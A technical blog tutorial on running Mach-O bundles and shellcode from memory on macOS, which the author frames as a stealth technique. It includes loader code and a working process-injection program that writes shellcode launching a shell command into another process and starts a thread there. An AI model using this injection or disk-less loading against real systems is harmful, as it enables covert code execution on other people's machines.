Executing Mach-Os In-Memory

In-memory execution on macOS: yes, it is a thing too. Some time ago, I read a post by Patrick Wardle about one of the Lazarus Group implants using remote downloads and in-memory execution. I decided to revisit this technique.

The term in-memory execution means that your executable code runs straight from memory without ever being written to disk as a physical file. As with any operating system, the trick is in dynamic loading. A process image in memory differs from its image on disk, so you cannot just copy a file into memory and execute it directly. Instead, you would use APIs like NSCreateObjectFileImageFromMemory and NSLinkModule, which handle the creation of the in-memory mapping and the linking. Both have long been deprecated in favor of dlopen.

I found this example, bundle-memory-load/main.c, which basically loads the binary or bundle into a region of memory.

But before we cover it, we need to know what a Mach-O file is (I’ll follow this reference; check it out). Mach-O is the standard file format for executables, object code, shared libraries, and core dumps on macOS and iOS. It is a highly structured binary format that stores the instructions and data needed to run code, and it comes in several types depending on how the code is meant to be used:

Executable: This contains code and data for running a program.
Dynamic Library (.dylib): Shared code usable by several programs.
Bundle (.bundle): A bundle gathers code that can be loaded dynamically at runtime, such as in the case of our tutorial.

The Mach-O format consists of a header, load commands, and segments. Together they describe what kind of file this is, how memory is laid out, and what linkage information the loader needs at runtime. Each segment may contain executable code, initialized data, and metadata. The dynamic linker, dyld, uses this metadata to map the file into memory, resolve symbols, and execute it.

Each segment holds a different part of the file. The two you will meet most often are the __TEXT segment, which holds the executable code, and the __DATA segment, which holds global variables. For example, here are the header and first load command of a 64-bit executable:

MH_MAGIC_64   X86_64   ALL LIB64   EXECUTE
ncmds=16  sizeofcmds=1544
flags: NOUNDEFS DYLDLINK TWOLEVEL PIE

LC_SEGMENT_64 __PAGEZERO
vmaddr  0x0
vmsize  0x100000000  (4 GB)
fileoff 0
filesize 0

Segments matter because they determine exactly how the binary gets loaded and how it behaves once it is in memory.
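To make the header fields concrete, here is a minimal sketch that classifies a buffer by its Mach-O header. It assumes a native-endian 64-bit image. The `demo_` names are hypothetical: the struct is a local mirror of `struct mach_header_64` from `<mach-o/loader.h>`, redeclared only so the sketch builds on any platform. On macOS you would include the real header instead.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Local mirror of struct mach_header_64 (hypothetical name, same layout). */
struct demo_mach_header_64 {
    uint32_t magic;      /* 0xfeedfacf for 64-bit Mach-O */
    int32_t  cputype;
    int32_t  cpusubtype;
    uint32_t filetype;   /* executable, dylib, bundle, ... */
    uint32_t ncmds;      /* number of load commands */
    uint32_t sizeofcmds; /* total size of the load commands */
    uint32_t flags;
    uint32_t reserved;
};

/* Values as defined in <mach-o/loader.h>. */
#define DEMO_MH_MAGIC_64 0xfeedfacfu
#define DEMO_MH_EXECUTE  0x2u
#define DEMO_MH_DYLIB    0x6u
#define DEMO_MH_BUNDLE   0x8u

/* Returns a label for the file type, or NULL if buf does not start
   with a native-endian 64-bit Mach-O header. */
const char *demo_macho_kind(const void *buf, size_t len) {
    struct demo_mach_header_64 h;
    assert(buf != NULL);
    if (len < sizeof h) return NULL;   /* too short to hold a header */
    memcpy(&h, buf, sizeof h);         /* avoid unaligned access */
    if (h.magic != DEMO_MH_MAGIC_64) return NULL;
    switch (h.filetype) {
        case DEMO_MH_EXECUTE: return "executable";
        case DEMO_MH_DYLIB:   return "dylib";
        case DEMO_MH_BUNDLE:  return "bundle";
        default:              return "other";
    }
}
```

Fed the first bytes of the file dumped above, `demo_macho_kind` would report an executable. The test.bundle used later in this post should come back as a bundle.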

The type most relevant to us is the bundle. A bundle is a kind of dynamically loadable image, similar to a dynamic library, that can be loaded at runtime, and dyld has the important job of linking and running it. When dyld processes the Mach-O header and load commands, it maps the respective file sections into memory, sets proper permissions like READ, EXECUTE, or READ/WRITE, and resolves all required symbols before passing control to the program’s entry point.

Now let’s discuss in a little more detail what dyld does. dyld is responsible for loading Mach-O files into memory and resolving their dependencies at runtime. It does this by parsing the file’s load commands, which tell dyld what segments need to be mapped into memory, what libraries need to be linked, and what symbols need to be resolved. This is precisely what happens when an executable or bundle is loaded from disk.

But for complete in-memory code execution, without spilling any payloads to disk, we have to do dyld’s job ourselves. Instead of relying on dyld to load the file off disk, we can manually load the Mach-O bundle into memory and do everything dyld normally does. That includes mapping the segments into memory, setting permissions, and resolving symbols.

Here’s a post by Adam Chester on how to patch dyld to load Mach-O bundles completely in memory, which allows us never to touch the disk. It’s a cool technique that leaves no artifact on disk, which makes it pretty useful for stealth.

When dyld loads a Mach-O file, it reads the header to understand the general layout of the file and then processes the load commands, working out how to map in the different segments. These segments are then mapped with appropriate permissions; for example, the __TEXT segment is normally marked executable, while the __DATA segment is marked as writable. Finally, dyld performs the symbol resolution and transfers control to the entry point, executing the code.
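The header-then-load-commands walk described above can be sketched as follows. This is an illustration of the parsing step only, not dyld’s actual code. The `demo_` structs are hypothetical local mirrors of `mach_header_64`, `load_command`, and `segment_command_64` from `<mach-o/loader.h>`, and the function name is made up for this example.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical local mirrors of the <mach-o/loader.h> layouts. */
struct demo_mach_header_64 {
    uint32_t magic; int32_t cputype; int32_t cpusubtype; uint32_t filetype;
    uint32_t ncmds; uint32_t sizeofcmds; uint32_t flags; uint32_t reserved;
};
struct demo_load_command { uint32_t cmd; uint32_t cmdsize; };
struct demo_segment_command_64 {
    uint32_t cmd; uint32_t cmdsize; char segname[16];
    uint64_t vmaddr; uint64_t vmsize; uint64_t fileoff; uint64_t filesize;
    int32_t maxprot; int32_t initprot; uint32_t nsects; uint32_t flags;
};

#define DEMO_MH_MAGIC_64   0xfeedfacfu
#define DEMO_LC_SEGMENT_64 0x19u

/* Walks the load commands and copies the named segment command into *out.
   Returns 1 if found, 0 if missing or malformed. *out may be overwritten
   with a non-matching segment when the function returns 0. */
int demo_find_segment(const uint8_t *buf, size_t len, const char *name,
                      struct demo_segment_command_64 *out) {
    struct demo_mach_header_64 h;
    assert(buf != NULL && name != NULL && out != NULL);
    if (len < sizeof h) return 0;
    memcpy(&h, buf, sizeof h);
    if (h.magic != DEMO_MH_MAGIC_64) return 0;

    size_t off = sizeof h;               /* load commands follow the header */
    for (uint32_t i = 0; i < h.ncmds; i++) {
        struct demo_load_command lc;
        if (off > len || len - off < sizeof lc) return 0;
        memcpy(&lc, buf + off, sizeof lc);
        /* cmdsize must cover the command and stay inside the buffer */
        if (lc.cmdsize < sizeof lc || lc.cmdsize > len - off) return 0;
        if (lc.cmd == DEMO_LC_SEGMENT_64 && lc.cmdsize >= sizeof *out) {
            memcpy(out, buf + off, sizeof *out);
            if (strncmp(out->segname, name, sizeof out->segname) == 0)
                return 1;
        }
        off += lc.cmdsize;               /* advance to the next command */
    }
    return 0;
}
```

Once a segment is found, its `vmaddr`, `vmsize`, `fileoff`, `filesize`, and `initprot` fields are what a loader would consult to decide where the bytes go and which permissions they get. The bounds checks are there because `ncmds` and `cmdsize` come straight from the file and should not be trusted.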

We can load and execute Mach-O files completely in memory by emulating this process, without the need to write anything to disk. That’s exactly what our example does: it opens a Mach-O bundle, maps it into memory, creates an object file image, links the module, resolves the symbol for the function we want to execute, and finally calls that function. (I’m repeating myself here :)

Now that we understand the inner workings of Mach-O files and how dyld processes them, let’s move forward with actual examples that tie together everything we’ve discussed. The goal is to demonstrate how we can emulate dyld’s behavior in loading and executing Mach-O bundles entirely in memory, avoiding the need to write payloads to disk.

Check out this piece of code, which loads a Mach-O bundle into memory, links it, resolves a symbol, and then calls a function from the bundle. In this example, we assume that the Mach-O bundle contains a function called _execute, which we will invoke after loading the bundle in memory.

// MachODynamicLoader.c
// Dynamically loads and executes a Mach-O bundle (_execute symbol).
// Uses dyld APIs to memory-map, link, resolve, and call.

#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>

#include <sys/mman.h>
#include <sys/stat.h>

#include <mach-o/dyld.h>

int main() {
    struct stat sb; void *code = NULL;
    NSObjectFileImage img = NULL; NSModule mdl = NULL; NSSymbol sym = NULL;
    void (*exec_fn)() = NULL;

    int fd = open("test.bundle", O_RDONLY); // open file
    if (fd < 0 || fstat(fd, &sb) < 0) return 1;

    // map Mach-O file
    code = mmap(NULL, sb.st_size, PROT_READ, MAP_PRIVATE, fd, 0); close(fd);
    if (code == MAP_FAILED) return 1;

    // create object file image
    if (NSCreateObjectFileImageFromMemory(code, sb.st_size, &img) != NSObjectFileImageSuccess)
        return munmap(code, sb.st_size), 1;

    // link module
    mdl = NSLinkModule(img, "module", NSLINKMODULE_OPTION_NONE);
    if (!mdl) return NSDestroyObjectFileImage(img), munmap(code, sb.st_size), 1;

    // resolve "_execute" symbol
    sym = NSLookupSymbolInModule(mdl, "_execute");
    if (!sym) return NSUnLinkModule(mdl, NSUNLINKMODULE_OPTION_NONE), 
                  NSDestroyObjectFileImage(img), munmap(code, sb.st_size), 1;

    // call resolved symbol
    if ((exec_fn = NSAddressOfSymbol(sym))) exec_fn();

    // cleanup
    NSUnLinkModule(mdl, NSUNLINKMODULE_OPTION_NONE);
    NSDestroyObjectFileImage(img);
    return munmap(code, sb.st_size), 0;
}

Here, we’ve essentially reproduced what dyld does to load and execute a Mach-O file, except that the image comes from a memory buffer rather than a path. Ordinarily, dyld parses the Mach-O from disk, maps the segments into memory, resolves symbols, and transfers control to the executable code. In our example we map the file into memory ourselves and hand that buffer to NSCreateObjectFileImageFromMemory and NSLinkModule, so it is still dyld that performs the linking and symbol resolution. We have changed where the bytes come from, not who links them.

However, remember that these APIs are deprecated (Apple’s dyld.h has marked them so since Mac OS X 10.5). They worked this way on older operating systems, but Apple no longer supports them, and modern systems may restrict or change their behavior. On contemporary macOS in particular, these functions may be heavily restricted or blocked outright, depending on protections such as System Integrity Protection (SIP).

The supported route for dynamic loading is the dlopen family of functions: dlopen, dlsym, dlclose. This allows for dynamic loading at runtime, symbol resolution, and unloading of libraries. However, dlopen still expects a file on disk. For purely in-memory execution, we need to manually parse the Mach-O headers and set up memory regions with mmap, mimicking dyld’s operations.

Hardened Runtime

Now let’s expand our example with another method of in-memory loading, this time using only non-deprecated functions:

// MachOLoader.c 
// Loads, resolves, and executes _execute from a Mach-O bundle 

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <fcntl.h>

#include <sys/mman.h>
#include <sys/stat.h>

#include <mach-o/loader.h>
#include <mach-o/nlist.h>

void load_macho(const char *path) {
    int fd = open(path, O_RDONLY); if (fd < 0) return;
    struct stat sb; if (fstat(fd, &sb) < 0) { close(fd); return; }
    char *codeAddr = mmap(NULL, sb.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0); close(fd);
    if (codeAddr == MAP_FAILED) return;

    struct mach_header_64 *header = (struct mach_header_64 *)codeAddr;
    if (header->magic != MH_MAGIC_64) { munmap(codeAddr, sb.st_size); return; }

    // Remember where __TEXT ends up so symbol values can be rebased onto it.
    char *textBase = NULL; uint64_t textVmaddr = 0;

    // Pass 1: give every segment its own RWX region and copy its file bytes in.
    struct load_command *loadCmd = (struct load_command *)(header + 1);
    for (uint32_t i = 0; i < header->ncmds; i++) {
        if (loadCmd->cmd == LC_SEGMENT_64) {
            struct segment_command_64 *segCmd = (struct segment_command_64 *)loadCmd;
            // Without MAP_FIXED, vmaddr is only a hint; the kernel may place the region elsewhere.
            char *segAddr = mmap((void *)segCmd->vmaddr, segCmd->vmsize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
            if (segAddr == MAP_FAILED) { munmap(codeAddr, sb.st_size); return; }
            memcpy(segAddr, codeAddr + segCmd->fileoff, segCmd->filesize);
            if (strncmp(segCmd->segname, SEG_TEXT, sizeof segCmd->segname) == 0) {
                textBase = segAddr; textVmaddr = segCmd->vmaddr;
            }
        }
        loadCmd = (struct load_command *)((char *)loadCmd + loadCmd->cmdsize);
    }

    // Pass 2: locate the symbol table load command.
    struct symtab_command *symTabCmd = NULL; loadCmd = (struct load_command *)(header + 1);
    for (uint32_t i = 0; i < header->ncmds; i++) {
        if (loadCmd->cmd == LC_SYMTAB) { symTabCmd = (struct symtab_command *)loadCmd; break; }
        loadCmd = (struct load_command *)((char *)loadCmd + loadCmd->cmdsize);
    }

    // No relocations or imports are processed, so this only works when _execute is self-contained.
    if (symTabCmd && textBase) {
        struct nlist_64 *symTbl = (struct nlist_64 *)(codeAddr + symTabCmd->symoff);
        char *strTbl = codeAddr + symTabCmd->stroff;
        for (uint32_t i = 0; i < symTabCmd->nsyms; i++) {
            if (strcmp(strTbl + symTbl[i].n_un.n_strx, "_execute") == 0) {
                // n_value is a link-time VM address; rebase it onto the mapped __TEXT copy.
                ((void (*)(void))(textBase + (symTbl[i].n_value - textVmaddr)))();
                break;
            }
        }
    }
    munmap(codeAddr, sb.st_size);
}

int main() { load_macho("test.bundle"); return 0; }

The logic is: we create a function called load_macho, which takes the path to the Mach-O as its argument. It opens the file, checks its size, and then memory-maps it into our process’s address space. Then we check that the header is indeed that of a 64-bit Mach-O, and we iterate through its load commands to map all the needed segments into executable memory.

Finally, we handle symbol resolution manually by searching the symbol table for the _execute symbol and calling it if found. In this manner, we demonstrate how in-memory execution can take place without writing anything to disk.
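The symbol search is worth seeing in isolation. Below is a minimal sketch of looking a name up in a Mach-O symbol table, with the bounds checks that the compact loader leaves out. The `demo_nlist_64` struct is a hypothetical local mirror of `struct nlist_64` from `<mach-o/nlist.h>`, with the `n_un` union flattened to its `n_strx` member. The function name is made up for this example.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical local mirror of struct nlist_64 (16 bytes per entry). */
struct demo_nlist_64 {
    uint32_t n_strx;   /* offset of the name in the string table */
    uint8_t  n_type;
    uint8_t  n_sect;
    uint16_t n_desc;
    uint64_t n_value;  /* link-time VM address for defined symbols */
};

/* Looks up name in the symbol table. On success stores the symbol's
   n_value in *value and returns 1; returns 0 if the name is absent. */
int demo_lookup_symbol(const struct demo_nlist_64 *syms, uint32_t nsyms,
                       const char *strtab, uint32_t strsize,
                       const char *name, uint64_t *value) {
    assert(syms != NULL && strtab != NULL && name != NULL && value != NULL);
    for (uint32_t i = 0; i < nsyms; i++) {
        uint32_t sx = syms[i].n_strx;
        if (sx >= strsize) continue;                 /* offset out of range */
        /* skip names that are not NUL-terminated inside the table */
        if (memchr(strtab + sx, '\0', strsize - sx) == NULL) continue;
        if (strcmp(strtab + sx, name) == 0) {
            *value = syms[i].n_value;
            return 1;
        }
    }
    return 0;
}
```

Note the leading underscore: a C function named execute shows up in the Mach-O symbol table as _execute, which is why the loader searches for that exact string. The value you get back is a link-time address, so it still has to be adjusted for wherever the segment actually landed in memory.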

As an alternative approach, we can perform in-memory execution by injecting and executing shellcode directly. For this, you can refer back to the earlier part where we discussed writing 64-bit assembly shellcode for macOS. That shellcode can then be converted into machine code and staged in memory using techniques like mmap and mprotect.

Here’s how you can showcase a simple stager/dropper that executes a small payload (shellcode) to download or pull another payload into memory. The downloaded payload is then executed directly from memory using the Mach-O techniques we discussed earlier.

We simulate downloading the payload into memory, but instead of fetching it over the network we use hardcoded shellcode: just a small snippet of machine code that prints “Hello World”. We call mmap() to allocate memory with READ/WRITE permissions, then copy the shellcode into the allocated space.

Next, we use mprotect() to change the memory permissions to READ/EXECUTE, making it executable. Finally, run_payload() executes the shellcode directly from memory by casting the memory pointer to a function pointer and calling it.
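The allocate, copy, and flip sequence can be sketched on its own. This is a minimal illustration under a few assumptions: the function name `demo_stage_rx` is hypothetical, the bytes are treated as opaque data, and the sketch stops at the permission change without ever calling into the region.

```c
#define _DEFAULT_SOURCE   /* exposes MAP_ANONYMOUS under strict modes on glibc */
#include <assert.h>
#include <stddef.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#ifndef MAP_ANONYMOUS
#define MAP_ANONYMOUS MAP_ANON
#endif

/* Copies len bytes into a fresh READ/WRITE mapping, then switches the
   mapping to READ/EXECUTE. Returns the mapping (and its page-rounded
   size in *mapped_len) or NULL on failure. The caller releases it with
   munmap(ptr, *mapped_len). */
void *demo_stage_rx(const void *bytes, size_t len, size_t *mapped_len) {
    assert(bytes != NULL && len > 0 && mapped_len != NULL);
    long page = sysconf(_SC_PAGESIZE);
    if (page <= 0) return NULL;
    /* mprotect works on whole pages, so round the size up */
    size_t size = (len + (size_t)page - 1) / (size_t)page * (size_t)page;

    void *mem = mmap(NULL, size, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) return NULL;

    memcpy(mem, bytes, len);             /* write while the region is RW */

    if (mprotect(mem, size, PROT_READ | PROT_EXEC) != 0) {
        munmap(mem, size);               /* the flip was refused */
        return NULL;
    }
    *mapped_len = size;
    return mem;
}
```

Keeping the region writable first and executable second, never both at once, is the point of the two-step dance. Whether the mprotect call is allowed at all depends on the platform’s policy, so the sketch treats a refusal as an ordinary failure.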

Virtual Memory Map of process 1195 (PayloadStager)
Output report format: 2.4  -- 64-bit process
VM page size: 4096 bytes

==== Non-writable regions for process 1195
REGION TYPE                 START - END            [ VSIZE  RSDNT  DIRTY   SWAP] PRT/MAX SHRMOD PURGE    REGION DETAIL
__TEXT                      105899000-10589d000    [   16K    16K     0K     0K] r-x/r-x SM=COW          /Users/USER/*/PayloadStager
__DATA_CONST                10589d000-1058a1000    [   16K    16K     4K     0K] r--/rw- SM=COW          /Users/USER/*/PayloadStager
__LINKEDIT                  1058a5000-1058a9000    [   16K     4K     0K     0K] r--/r-- SM=COW|NUL      /Users/USER/*/PayloadStager
dyld private memory         1058a9000-1059a9000    [ 1024K    12K    12K     0K] r--/rwx SM=PRV
shared memory               1059ab000-1059ad000    [    8K     8K     8K     0K] r--/r-- SM=SHM
MALLOC metadata             1059ad000-1059c0000    [   12K    12K    12K     0K] r--/rwx SM=ZER|PRV
MALLOC guard pages          1059b2000-1059be000    [   16K     0K     0K     0K] ---/rwx SM=ZER|NUL

As expected, the executable code resides in the __TEXT segment, which has r-x permissions. This indicates that the memory is readable and executable, but not writable, as is typical for code segments.

Note that the dyld private memory region is listed as r--/rwx. In vmmap’s PRT/MAX column the first triple is the current protection and the second is the maximum the region is allowed to have, so this region is currently read-only but may be made writable or executable. SM=PRV marks it as process-private memory. Both are consistent with what we would expect when memory is set up with mmap and later flipped to executable for shellcode, as in this code.

If we follow the system calls closely, we can see mmap allocate memory at address 0x10EA93000 with its initial permissions: PROT_READ | PROT_WRITE (0x3) allows reading and writing the allocated memory.

The mprotect system call is then used to modify the permissions. In this case, the memory at address 0x10EA95000 is changed from writable to executable: the 0x5 argument is PROT_READ | PROT_EXEC, which grants execute permission and allows the payload to run from this region.
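If the numeric flags are hard to keep straight, a tiny helper that renders a protection value the way vmmap prints it can help. This is just a reading aid with a hypothetical function name. It relies only on the PROT_READ, PROT_WRITE, and PROT_EXEC constants from `<sys/mman.h>`.

```c
#include <assert.h>
#include <stddef.h>
#include <sys/mman.h>

/* Renders an mmap/mprotect protection value as an "rwx"-style string.
   out must have room for 4 bytes (three flags plus the terminator). */
void demo_prot_string(int prot, char out[4]) {
    assert(out != NULL);
    out[0] = (prot & PROT_READ)  ? 'r' : '-';
    out[1] = (prot & PROT_WRITE) ? 'w' : '-';
    out[2] = (prot & PROT_EXEC)  ? 'x' : '-';
    out[3] = '\0';
}
```

With PROT_READ = 0x1, PROT_WRITE = 0x2, and PROT_EXEC = 0x4, a value of 0x3 renders as rw- and 0x5 renders as r-x, which matches the two states the staged memory passes through.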

This is of course the most basic, naive way. If we want to play a little, we can introduce a payload into the memory of another process using the Mach VM API, following the same principles. You can use task_for_pid for this, but make sure you have the privileges.

To give you an idea: allocate some memory, drop the shellcode in, make it executable, and let it run. First, we allocate memory in the target process using mach_vm_allocate. We want to reserve a chunk of space that can hold our shellcode. This is where our executable code will live. Once we have the space, we write the shellcode into that memory region with mach_vm_write. At this stage, make sure that the shellcode is properly laid out in memory for execution.

Next, we set the memory protections with mach_vm_protect, making the region executable. This allows our shellcode to run without hitting any access violations. Now, with the shellcode in place and ready to execute, we need to create a thread within the target process. This can be done with thread_create_running, pointing the program counter at our shellcode’s address and setting the stack pointer appropriately.

Source : MachExec

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdarg.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>

#define PAGESIZE sysconf(_SC_PAGESIZE)

unsigned char shellcode[] = {
    0x48, 0x31, 0xd2,             // xor    rdx, rdx
    0x52,                         // push   rdx
    0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x7a, 0x73, 0x68,  // mov    rbx, '/bin/zsh'
    0x53,                         // push   rbx
    0x48, 0x89, 0xe7,             // mov    rdi, rsp 
    0x48, 0x31, 0xc0,             // xor    rax, rax
    0x66, 0xb8, 0x2d, 0x63,       // mov    ax, 0x632d
    0x50,                         // push   rax
    0x48, 0x89, 0xe3,             // mov    rbx, rsp 
    0x52,                         // push   rdx (null)
    0xeb, 0x0f,                   // jmp    0x0f
    0x53,                         // push   rbx
    0x57,                         // push   rdi
    0x48, 0x89, 0xe6,             // mov    rsi, rsp
    0x6a, 0x3b,                   // push   0x3b 
    0x58,                         // pop    rax 
    0x48, 0x0f, 0xba, 0xe8, 0x19, 0x0f, 0x05, // (execve)
    0xe8, 0xec, 0xff, 0xff, 0xff,  
    0x6f, 0x70, 0x65, 0x6e, 0x20, 0x2d, 0x61, 0x20, 
    0x43, 0x61, 0x6c, 0x63, 0x75, 0x6c, 0x61, 0x74, 
    // 0x90, 0x90, 
    0x6f, 0x72, 0x00,       // "open -a Calculator" (the command string passed to zsh -c)
    0x52
};

void die(const char *m) { perror(m); exit(1); }
void wht(const char *f, ...) { va_list a; va_start(a, f); vfprintf(stderr, f, a); va_end(a); }

mach_vm_address_t alloc(task_t t, size_t s) {
    mach_vm_address_t a = 0;
    if (mach_vm_allocate(t, &a, s, VM_FLAGS_ANYWHERE) != KERN_SUCCESS) die("alloc");
    return a;
}

void write_mem(task_t t, mach_vm_address_t a, void *d, size_t s) {
    if (mach_vm_write(t, a, (vm_offset_t)d, s) != KERN_SUCCESS) die("write");
}

void make_exec(task_t t, mach_vm_address_t a, size_t s) {
    if (mach_vm_protect(t, a, s, FALSE, VM_PROT_READ | VM_PROT_EXECUTE) != KERN_SUCCESS) die("protect");
    wht("[+] RX at 0x%llx\n", a);
}

void create_th(task_t t, mach_vm_address_t rip, mach_vm_address_t rsp) {
    x86_thread_state64_t s = {0};
    s.__rip = (uint64_t)rip;
    s.__rsp = (uint64_t)rsp;
    
    thread_act_t th;
    if (thread_create_running(t, x86_THREAD_STATE64, (thread_state_t)&s, x86_THREAD_STATE64_COUNT, &th) != KERN_SUCCESS)
        die("thread");
    wht("[+] RIP=0x%llx RSP=0x%llx\n", rip, rsp);
}

int main(int argc, char *argv[]) {
    if (argc != 2) { 
        fprintf(stderr, "Usage: %s <pid>\n", argv[0]);
        return 1; 
    }

    task_t target;
    pid_t pid = atoi(argv[1]);
    if (task_for_pid(mach_task_self(), pid, &target) != KERN_SUCCESS) die("task_for_pid");

    wht("[+] Got task %d\n", pid);
    size_t shellcode_size = sizeof(shellcode);

    mach_vm_address_t shellcode_addr = alloc(target, shellcode_size);
    write_mem(target, shellcode_addr, shellcode, shellcode_size);
    make_exec(target, shellcode_addr, shellcode_size);

    mach_vm_address_t stack_addr = alloc(target, PAGESIZE);
    create_th(target, shellcode_addr, stack_addr + PAGESIZE);

    wht("[+] ~;~\n");
    return 0;
}

Regardless of what the shellcode does, the flow remains similar: allocate memory, write the code, make it executable, set up the env, and then execute it.

If you somehow jumped directly here: the code uses task_for_pid(), mach_vm_allocate(), and mach_vm_write(), which macOS restricts to processes with admin rights, thanks to SIP of course. We launch the executable under lldb, the debugger, which confirms that the stack memory was also allocated, setting up the env for our shellcode. You can debug it further from there.